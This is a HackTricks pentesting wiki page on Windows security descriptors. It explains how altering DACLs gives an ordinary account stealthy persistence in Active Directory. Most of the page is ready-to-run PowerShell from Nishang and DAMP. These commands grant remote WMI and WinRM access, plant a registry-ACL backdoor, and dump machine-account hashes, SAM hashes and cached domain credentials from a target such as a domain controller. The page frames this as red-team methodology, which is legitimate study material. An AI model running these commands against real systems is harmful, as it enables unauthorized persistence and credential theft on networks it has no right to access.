security-descriptors.md (4081B)
1 --- 2 title: "Security Descriptors" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/security-descriptors.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/security-descriptors.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Security Descriptors 14 15 ## Security Descriptors 16 17 Windows security descriptors contain an owner SID, a primary-group SID, a discretionary ACL (DACL) that controls access, and a system ACL (SACL) used mainly for auditing. Security Descriptor Definition Language (SDDL) is the textual representation; an ACE string has the form `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`.<sup>[[1]](#references)[[4]](#references)</sup> 18 19 A security descriptor stores who owns a securable object and which principals are allowed or denied specific rights over it. If an attacker can change a DACL, they may grant a low-privileged principal rights that normally require an administrative role. 20 21 This makes narrowly modified descriptors useful for persistence: the account remains outside obvious privileged groups while retaining access to a particular management surface. Preserve the original descriptor before testing so the change can be removed exactly. 22 23 ### Access to WMI 24 25 You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)<sup>[[2]](#references)</sup>: 26 27 ```bash 28 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Verbose 29 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Remove -Verbose # Remove 30 ``` 31 32 ### Access to WinRM 33 34 Grant a user access to a remote PowerShell/WinRM endpoint with Nishang's `Set-RemotePSRemoting` function:<sup>[[2]](#references)</sup> 35 36 ```bash 37 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose 38 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove 39 ``` 40 41 ### Remote access to hashes 42 43 DAMP can create a registry-ACL backdoor that later permits remote retrieval of the machine-account hash, local SAM hashes, and cached domain credentials. Granting these narrow rights to an otherwise ordinary account—especially against a domain controller—provides powerful persistence without privileged-group membership.<sup>[[3]](#references)</sup> 44 45 ```bash 46 # allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials. 47 Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose 48 49 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine. 50 Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose 51 52 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine. 53 Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose 54 55 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine. 56 Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose 57 ``` 58 59 Check [**Silver Tickets**](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket) to learn how you could use the hash of the computer account of a Domain Controller. 60 61 ## References 62 63 - [1] [Security Descriptor Definition Language - Microsoft Learn](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language) 64 - [2] [nishang - Set-RemoteWMI.ps1](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) 65 - [3] [DAMP - Discretionary ACL Modification Project](https://github.com/HarmJ0y/DAMP) 66 - [4] [Microsoft Learn — Security descriptor string format](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format)